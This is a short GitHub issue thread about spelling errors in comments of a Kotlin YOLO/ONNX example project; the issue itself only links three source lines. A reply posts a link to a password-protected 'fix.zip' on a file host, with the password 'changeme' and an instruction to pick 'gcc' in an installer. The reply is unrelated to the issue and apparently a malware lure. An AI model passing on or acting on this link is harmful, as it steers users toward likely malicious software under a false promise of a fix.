### ISSUE TITLE
Spelling errors in code comments

### ISSUE THREAD

**Issue by qingshu-ui** [qingshu-ui/example-ayaka#1]
https://github.com/qingshu-ui/example-ayaka/blob/8bf4cf24f0ca0001d266a79a2ee86bf1b6f37bf5/src/main/kotlin/io/github/qingshu/ayaka/example/yolo/YOLO.kt#L182
https://github.com/qingshu-ui/example-ayaka/blob/8bf4cf24f0ca0001d266a79a2ee86bf1b6f37bf5/src/main/kotlin/io/github/qingshu/ayaka/example/yolo/compatible/ONNX.kt#L39
https://github.com/qingshu-ui/example-ayaka/blob/8bf4cf24f0ca0001d266a79a2ee86bf1b6f37bf5/src/main/kotlin/io/github/qingshu/ayaka/example/yolo/compatible/AbstractONNX.kt#L86

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
